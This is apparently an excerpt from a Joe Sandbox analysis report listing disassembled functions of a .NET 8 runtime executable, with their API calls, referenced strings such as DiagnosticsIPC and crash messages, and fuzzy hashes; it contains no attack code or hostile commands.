Similarity

API ID: free$ByteCharMultiWide$malloc$CommandCurrentLineProcessstrcmp
String ID: 8.0.0$DOTNET_IPC_V1$Failed to send DiagnosticsIPC response$Windows$win-x86$x86
API String ID: 1425245846-3660312627
Opcode ID: 198dc516a5c31ae37262cb489a7d41b153d0b6d5a9bacdfe7f9f438a7a0eb215
Instruction ID: b2da144ffd6b420dc00798f02f749155190cd0251200b5692487031a9e819030
Opcode Fuzzy Hash: 198dc516a5c31ae37262cb489a7d41b153d0b6d5a9bacdfe7f9f438a7a0eb215
Instruction Fuzzy Hash: A2A1A574E042059BDB24DFA9D865BAFBBB5FF48700F14012DF812AB241EB71A905CB91

Function 00A34A60 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 269COMMON

Download Yara Rule

APIs

Part of subcall function 00A310F0: GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,00A34810,?,00000000), ref: 00A31107
Part of subcall function 00A310F0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 00A3117F
Part of subcall function 00A310F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A311A2

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 00A34A9A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A34AAA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,15FF00DB,000000FF,00000000,00000000), ref: 00A34AC6
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A34AD5
free.API-MS-WIN-CRT-HEAP-L1-1-0(629C35FF), ref: 00A34B2C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A34B3A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A34B48
free.API-MS-WIN-CRT-HEAP-L1-1-0(006A1024), ref: 00A34B59
free.API-MS-WIN-CRT-HEAP-L1-1-0(15FF00DB), ref: 00A34B6A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 00A34BA4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A34BBB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 00A34BDE
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A34BE9
GetCurrentProcessId.KERNEL32 ref: 00A34C41

Strings

Failed to send DiagnosticsIPC response, xrefs: 00A34B11
Windows, xrefs: 00A34B99, 00A34BD2
DOTNET_IPC_V1, xrefs: 00A34D3D
8.0.0, xrefs: 00A34C2C
x86, xrefs: 00A34C00

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$ByteCharMultiWide$malloc$CommandCurrentLineProcessstrcmp
String ID: 8.0.0$DOTNET_IPC_V1$Failed to send DiagnosticsIPC response$Windows$x86
API String ID: 1425245846-2979678079
Opcode ID: baea0f785ad3a3007c86dd593e87d90029ec97afd75bf2eb1aa0767a2ece85db
Instruction ID: bfe49b7f0ab8dbe80f090a00a8759a54d509d818dc198b853af99d99827532a3
Opcode Fuzzy Hash: baea0f785ad3a3007c86dd593e87d90029ec97afd75bf2eb1aa0767a2ece85db
Instruction Fuzzy Hash: 7C91BF74A042059BDB28DFA5ECA5BBFB7B4EF48740F14012CF812A7291EB70E905CB65

Function 00A338B0 Relevance: 30.2, APIs: 5, Strings: 12, Instructions: 499COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,74FDD070), ref: 00A33976
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,74FDD070), ref: 00A33FB6

Strings

ds_ipc_stream_factory_get_next_available_stream - SIG :: Poll attempt: %d, connection %d signalled., xrefs: 00A33D35
ds_ipc_stream_factory_get_next_available_stream - ERR :: Poll attempt: %d, connection %d errored. Connection is reset., xrefs: 00A33DAA
ds_ipc_stream_factory_get_next_available_stream - Poll attempt: %d, timeout: %dms., xrefs: 00A33ADF
ds_ipc_stream_factory_get_next_available_stream - HUP :: Poll attempt: %d, connection %d hung up. Connect is reset., xrefs: 00A33CAB
ds_ipc_stream_factory_get_next_available_stream - UNK :: Poll attempt: %d, connection %d had invalid PollEvent., xrefs: 00A33E0C
ds_ipc_stream_factory_get_next_available_stream - ENTER, xrefs: 00A338D9
{ _hPipe = %d, _oOverlap.hEvent = %d }, xrefs: 00A33B24, 00A33B78
ds_ipc_stream_factory_get_next_available_stream - EXIT :: Poll attempt: %d, stream using handle %d., xrefs: 00A33F73
CLIENT IpcPollHandle[%d] = %s, xrefs: 00A33BB3
ds_ipc_stream_factory_get_next_available_stream - Nothing to poll, sleeping using timeout: %dms., xrefs: 00A33E2E
ds_ipc_stream_factory_get_next_available_stream - NON :: Poll attempt: %d, connection %d had no events., xrefs: 00A33DE9
SERVER IpcPollHandle[%d] = %s, xrefs: 00A33B5F

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free
String ID: CLIENT IpcPollHandle[%d] = %s$SERVER IpcPollHandle[%d] = %s$ds_ipc_stream_factory_get_next_available_stream - ENTER$ds_ipc_stream_factory_get_next_available_stream - ERR :: Poll attempt: %d, connection %d errored. Connection is reset.$ds_ipc_stream_factory_get_next_available_stream - EXIT :: Poll attempt: %d, stream using handle %d.$ds_ipc_stream_factory_get_next_available_stream - HUP :: Poll attempt: %d, connection %d hung up. Connect is reset.$ds_ipc_stream_factory_get_next_available_stream - NON :: Poll attempt: %d, connection %d had no events.$ds_ipc_stream_factory_get_next_available_stream - Nothing to poll, sleeping using timeout: %dms.$ds_ipc_stream_factory_get_next_available_stream - Poll attempt: %d, timeout: %dms.$ds_ipc_stream_factory_get_next_available_stream - SIG :: Poll attempt: %d, connection %d signalled.$ds_ipc_stream_factory_get_next_available_stream - UNK :: Poll attempt: %d, connection %d had invalid PollEvent.${ _hPipe = %d, _oOverlap.hEvent = %d }
API String ID: 1294909896-2040380821
Opcode ID: 94623a34069281d92aab7e2a67fc0cf7388f67728c74124d8a8bb92170d0ebf0
Instruction ID: 177b768fa2802e7e69ad4f5ca93739830e36dc649e3805ddeeeb976d67d5707e
Opcode Fuzzy Hash: 94623a34069281d92aab7e2a67fc0cf7388f67728c74124d8a8bb92170d0ebf0
Instruction Fuzzy Hash: 2012F332E042189FDF209B24DC45BAAB7B5AF94740F1441E9F50DA7392EB749E85CF50

Function 00A32330 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 286memorystringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 00A32435
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000008,?), ref: 00A32446
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00A32469
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00A32494
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00A324BD
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 00A324FC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00A3250E
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00A32532
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00A3254E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00A3257E
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00A32600
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00A3260E
HeapFree.KERNEL32(00000000,00000000,00000000,00000008,?), ref: 00A32634
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000008,?), ref: 00A3263F
HeapFree.KERNEL32(00000000,?,00000000,00000008,?), ref: 00A32658
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000008,?), ref: 00A32663

Strings

Microsoft-Windows-DotNETRuntimeRundown, xrefs: 00A32579

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharFreeHeapMultiWidefree$malloc$isspacestrcmp
String ID: Microsoft-Windows-DotNETRuntimeRundown
API String ID: 3243207744-930870680
Opcode ID: 0665138e186ca462a3060190c20418fea8e0a4fdb2b184629a49e9b26a580d79
Instruction ID: 69a699f6008415cf7d53491756b04947f22cb12eabd2a3f112a035899abd4383
Opcode Fuzzy Hash: 0665138e186ca462a3060190c20418fea8e0a4fdb2b184629a49e9b26a580d79
Instruction Fuzzy Hash: 01A18E70E00319AFDB21CFA5DC85BAEBBB9FF45314F144225F815A7291DB719A00CBA4

Function 008DB420 Relevance: 28.6, APIs: 5, Strings: 11, Instructions: 565memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,BBFE6088,80131506,?), ref: 008DB4C8

Part of subcall function 009865E0: GetModuleFileNameW.KERNEL32(00710000,00000000), ref: 00986666
Part of subcall function 009865E0: GetLastError.KERNEL32 ref: 00986697
Part of subcall function 009865E0: SetLastError.KERNEL32(00000000,00000000), ref: 009867A1

HeapFree.KERNEL32(00000000,00000000), ref: 008DB664

Part of subcall function 0071DEE0: HeapFree.KERNEL32(00000000,?,BBFE6088,BBFE6088,?), ref: 0071DF8B

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

HeapFree.KERNEL32(00000000,00000000,00D01A94,00000002,00000000,00000002), ref: 008DB96C
HeapFree.KERNEL32(00000000,00000000,00D01A94,8.0.0,.NET Version: ,00D01A94,8.0.23.53103,?,00000000,00000002,00D01A94,00000002,00000000,00000002), ref: 008DBBFA
HeapFree.KERNEL32(00000000,00000000,00D01A94,8.0.0,.NET Version: ,00D01A94,8.0.23.53103,?,00000000,00000002,00D01A94,00000002,00000000,00000002), ref: 008DBC20

Strings

8.0.0, xrefs: 008DBA50
Description: The process was terminated due to an unhandled exception., xrefs: 008DBB0F
Description: The process was terminated due to an internal error in the .NET Runtime , xrefs: 008DBB63
Description: The process was terminated due to a stack overflow., xrefs: 008DBB91
.NET Version: , xrefs: 008DBA44
8.0.23.53103, xrefs: 008DBA2C
unknown, xrefs: 008DB7F5, 008DB80F
Description: The application requested process termination through System.Environment.FailFast., xrefs: 008DBB3B
CoreCLR Version: , xrefs: 008DB8A0
Description: The application encountered a bug. A managed code contract (precondition, postcondition, object invariant, or assert, xrefs: 008DBBB6
Application: , xrefs: 008DB5B8

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$ErrorLastModule$FileHandleName
String ID: .NET Version: $8.0.0$8.0.23.53103$Application: $CoreCLR Version: $Description: The application encountered a bug. A managed code contract (precondition, postcondition, object invariant, or assert$Description: The application requested process termination through System.Environment.FailFast.$Description: The process was terminated due to a stack overflow.$Description: The process was terminated due to an internal error in the .NET Runtime $Description: The process was terminated due to an unhandled exception.$unknown
API String ID: 3739261088-22776238
Opcode ID: 1a46ca8c2405dd351aba6bff7a77df384e074318d4575c4aa4eb3394de403f20
Instruction ID: c9b9e693184f3e1395de560f59bf195a765c57625249388939e484f6eff1809f
Opcode Fuzzy Hash: 1a46ca8c2405dd351aba6bff7a77df384e074318d4575c4aa4eb3394de403f20
Instruction Fuzzy Hash: 55328F71A00219DBDB24DF28C85ABA9B7B1FF54354F1086AAE549EB3C1DB749E84CF40

Function 00A347F0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 208COMMON

Download Yara Rule

APIs

Part of subcall function 00A310F0: GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,00A34810,?,00000000), ref: 00A31107
Part of subcall function 00A310F0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 00A3117F
Part of subcall function 00A310F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A311A2

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,00000000), ref: 00A34822
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A34832
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00A3484E
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A3485D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00A348A8
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000000), ref: 00A348B6
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000000), ref: 00A348C4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 00A348FE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A34915
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 00A34938
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A34943
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A34971

Strings

Failed to send DiagnosticsIPC response, xrefs: 00A3488D
Windows, xrefs: 00A348F3, 00A3492C
DOTNET_IPC_V1, xrefs: 00A34A1F
x86, xrefs: 00A3495A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$ByteCharMultiWide$malloc$CommandCurrentLineProcessstrcmp
String ID: DOTNET_IPC_V1$Failed to send DiagnosticsIPC response$Windows$x86
API String ID: 1425245846-4166280127
Opcode ID: 627ff1e5b83c0564720a456b7e1c4c5b93e2d424bbaa4c47ccfbab15526fe5d5
Instruction ID: 1436f0a2070e67add4aff1f20d70071740fd62e9498ba54f9bfc0b0bb4549ff2
Opcode Fuzzy Hash: 627ff1e5b83c0564720a456b7e1c4c5b93e2d424bbaa4c47ccfbab15526fe5d5
Instruction Fuzzy Hash: 42612870A04245ABEB24DFA5EC56BBFBBB5EF88700F14012CF906A7291DB74AE05C750

Function 00A284C0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 212memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(BBFE6088,?,00000000,00004000), ref: 0097480E
Part of subcall function 009747A0: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 00974822
Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097482E
Part of subcall function 009747A0: HeapFree.KERNEL32(00000000,00000000), ref: 00974852

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,BBFE6088,00000000,00000004,00000000), ref: 00A28547
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,00000000,00C58675,000000FF), ref: 00A28559
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00A2857A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00C58675,000000FF), ref: 00A28585
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000004,00000000,?,?,?,?,?,?,00000000,00C58675,000000FF), ref: 00A285AF
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,BBFE6088,00000000,00000004,00000000), ref: 00A28607
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A28619
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00A2863A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00C58675,000000FF), ref: 00A28645
HeapFree.KERNEL32(00000000,00000000), ref: 00A28671
GetCurrentProcessId.KERNEL32 ref: 00A28681
_swprintf.LIBCMT ref: 00A28693
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,BBFE6088,00000000,00000004,00000000,?,?,?,?,?,?,00000000,00C58675,000000FF,?,00A28FAF), ref: 00A28706
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,BBFE6088,00000000,00000004,00000000,?,?,?,?,?,?,00000000,00C58675,000000FF,?,00A28FAF), ref: 00A28714

Part of subcall function 00974900: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00C7A98C,?,0088D4DA), ref: 00974950

Strings

trace.nettrace, xrefs: 00A286D6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharFreeHeapMultiWidefree$_errnomalloc$CurrentProcess_swprintfwcstoul
String ID: trace.nettrace
API String ID: 523469554-2227795629
Opcode ID: aa7e36e5facc7c261b9703ab75f6c444a2c5eaaba32ebf70f3d6c2c47c3d6455
Instruction ID: 48549a6ea1b81a9bbc8e1145efb370d8ecf12f0a10346c6d2406e0329ec948bf
Opcode Fuzzy Hash: aa7e36e5facc7c261b9703ab75f6c444a2c5eaaba32ebf70f3d6c2c47c3d6455
Instruction Fuzzy Hash: F271EC71E01324ABDB209FA9EC45BAEBBB5EF48710F104235F915B72C1DFB499008BA5

Function 00733C60 Relevance: 25.4, APIs: 13, Strings: 1, Instructions: 875memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetTokenForVTableEntry), ref: 00733CDA

Part of subcall function 0096F430: GetProcessHeap.KERNEL32(BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F45E
Part of subcall function 0096F430: RtlAllocateHeap.NTDLL(03400000,00000000,00000030,BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F47A

Part of subcall function 0074F7B0: EnterCriticalSection.KERNEL32(74FDD070,?,74FDD070,?,74FDD070,?,008384AE,?,00983B95), ref: 0074F839

LeaveCriticalSection.KERNEL32(00000000), ref: 00733FE8

Part of subcall function 00720180: LeaveCriticalSection.KERNEL32(00000000,BBFE6088,00000000,?,?,00C133F0,000000FF,?,00757CA6,?,0000000C,?,?,?,?,BBFE6088), ref: 007201A7

Part of subcall function 008A8B10: HeapFree.KERNEL32(00000000,?,00000018,0000000C,BBFE6088,00000000,00000000,?,?,00000000,00C35AB0,000000FF,?,00000000,00733EAA,00000000), ref: 008A8BB5

LeaveCriticalSection.KERNEL32(?), ref: 007342C9
HeapFree.KERNEL32(00000000,?), ref: 00734332

Part of subcall function 00733AD0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(_CorDllMain,?,?,?), ref: 00733BD5
Part of subcall function 00733AD0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(__CorDllMain@12,?), ref: 00733BEA
Part of subcall function 00733AD0: GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 00733C03

LeaveCriticalSection.KERNEL32(?,0000001C,00000004,?), ref: 0073449C
LeaveCriticalSection.KERNEL32(?,00000014,00000004,?,00000000,0000001C,00000000,0000001C,00000004,?), ref: 007345D9
GetCurrentProcess.KERNEL32(00000002,0000000A,?,00000000,00000014,00000000,00000014,00000004,?,00000000,0000001C,00000000,0000001C,00000004,?), ref: 00734699
FlushInstructionCache.KERNEL32(00000000), ref: 007346A0
VirtualProtect.KERNEL32(?,00000004,00000004,?), ref: 007346B1
VirtualProtect.KERNEL32(?,00000004,?,?), ref: 007346D7

Strings

GetTokenForVTableEntry, xrefs: 00733CD4

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Heap$FreeProcessProtectVirtualstrcmp$AddressAllocateCacheCurrentEnterFlushHandleInstructionModuleProc
String ID: GetTokenForVTableEntry
API String ID: 3431045027-2104580547
Opcode ID: 39e1689abcd93fd5baf3373b83b20271eb49d1facf973693333a8506f6e5df4e
Instruction ID: 9fe4a94cdaa519cc0233d177cf9c9289bc9ca39e46381088497e9bf8c9b81f3e
Opcode Fuzzy Hash: 39e1689abcd93fd5baf3373b83b20271eb49d1facf973693333a8506f6e5df4e
Instruction Fuzzy Hash: 99825D70E01219DFEB28DFA8C845BADBBB1FF49314F148159E845A7392DB78AD41CB90

Function 007623F0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 277COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(BBFE6088,80131506,?,?,00829515,?,00000000,80131506,00DA3158), ref: 00762462
RaiseFailFastException.KERNEL32(?,?,00000000,?,00829515,?,00000000,80131506), ref: 00762590
IsDebuggerPresent.KERNEL32(?,00829515,?,00000000,80131506,00DA3158), ref: 007625F1
SetErrorMode.KERNEL32(00000000,?,00829515,?,00000000,80131506,00DA3158), ref: 00762602
SetErrorMode.KERNEL32(00000000,?,00829515,?,00000000,80131506,00DA3158), ref: 0076260C

Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(BBFE6088,?,00000000,00004000), ref: 0097480E
Part of subcall function 009747A0: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 00974822
Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097482E
Part of subcall function 009747A0: HeapFree.KERNEL32(00000000,00000000), ref: 00974852

